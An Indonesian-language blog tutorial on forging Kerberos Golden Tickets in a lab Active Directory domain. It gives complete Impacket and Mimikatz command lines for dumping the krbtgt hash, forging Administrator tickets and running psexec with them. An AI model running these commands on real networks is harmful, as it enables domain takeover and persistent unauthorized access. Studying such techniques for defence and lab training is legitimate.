Active Directory Persistence: Golden Ticket Attack

Active Directory Persistence: Golden Ticket. Ini adalah lanjutan artikel sebelumnya mengenai DCSync Attack. Ketika kita sudah berhasil mendapatkan hash dari Domain Controller, khususnya hash dari akun krbtgt, kita dapat menggunakan hash tersebut untuk melakukan crafting Golden Ticket. Ticket tersebut nantinya dapat kita gunakan untuk melakukan autentikasi ke mesin didalam domain.

Oke jadi sampai disini dapat disimpulkan bahwa komponen paling penting untuk melakukan Golden Ticket Attack adalah hash dari krbtgt, meskipun nanti ada beberapa komponen lain yang dibutuhkan.

Untuk melakukan forging Golden Ticket, ada beberapa tools yang bisa dipakai. Yang pertama kita akan membahas penggunaan Impacket dalam crafting Golden Ticket.

Impacket

Pertama, lakukan DCSync atau dump hash krbtgt dari Domain Controller. Kalian bisa gunakan impacket-secretsdump.

impacket-secretsdump 'evasvc':'Serviceworks1'@evangelion.lab -just-dc-user krbtgt

Selanjutnya, kalian perlu mendapatkan SID dari domain. Kalian bisa gunakan impacket-lookupsid.

impacket-lookupsid 'evasvc':'Serviceworks1'@evangelion.lab -domain-sids

Oh iya untuk enumerasi Domain SID hanya membutuhkan valid domain user saja, tidak harus user dengan privilege Domain Admin.

Selanjutnya kita dapat menggunakan impacket-ticketer untuk melakukan crafting ticket.

impacket-ticketer -nthash 03cbacc2724a06c820bbe54d9b0cf20d -domain evangelion.lab -domain-sid S-1-5-21-922206919-2725117373-1955617319 Administrator

Perintah ini akan melakukan generate ticket untuk user Administrator.

Selanjutnya ticket akan tersimpan dengan nama Administrator.ccache di direktori tempat impacket-ticketer dieksekusi.

Setelah ticket berhasil didapatkan, kalian dapat melakukan Pass The Ticket. Disini sebagai contoh saya akan menggunakan ticket tersebut untuk mengeksekusi impacket-psexec.

KRB5CCNAME=Administrator.ccache impacket-psexec -dc-ip 172.16.8.139 -no-pass -k evangelion.lab/administrator@EVANGELION-PC.EVANGELION.lab

Pada beberapa case, kerberos menolak ticket yang digenerate dengan hash NT. Kalian bisa ganti ke hash yang lebih kuat seperti aes256.

impacket-ticketer -aesKey 44da586489fee5d59df92aa0cd288ee669ea339f0c26214588710286d3edaca1  -domain evangelion.lab -domain-sid S-1-5-21-922206919-2725117373-1955617319 Administrator

Perintah diatas untuk melakukan forging ticket dengan aes256. Note: aes key nya didapat dari DCSync.

Oke, sampai disini kalian sudah berhasil mengeksekusi Golden Ticket Attack. Oh iya by default ticket ini akan valid selama 10 tahun, namun kalian bisa mengganti durasinya melalui flag -duration pada impacket-ticketer.

Mimikatz

Cara kedua adalah menggunakan Mimikatz. Sama seperti sebelumnya, kita hanya perlu mendapatkan hash dari krbtgt. Jika semua sudah oke, maka command untuk geterate ticketnya adalah:

mimikatz.exe "kerberos::golden /domain:evangelion.lab /sid:S-1-5-21-922206919-2725117373-1955617319 /aes256:44da586489fee5d59df92aa0cd288ee669ea339f0c26214588710286d3edaca1 /user:Administrator /ptt"

Ticket tersebut diinject ke session saat ini.

Oke sekarang kalian bisa mengakses Domain Controller menggunakan utilitas seperti PsExec.

Oke mungkin itu saja sharing singkat kali ini mengenai Golden Ticket Attack. Jika ada yang ingin ditanyakan atau ditambahkan silahkan tinggalkan komentar.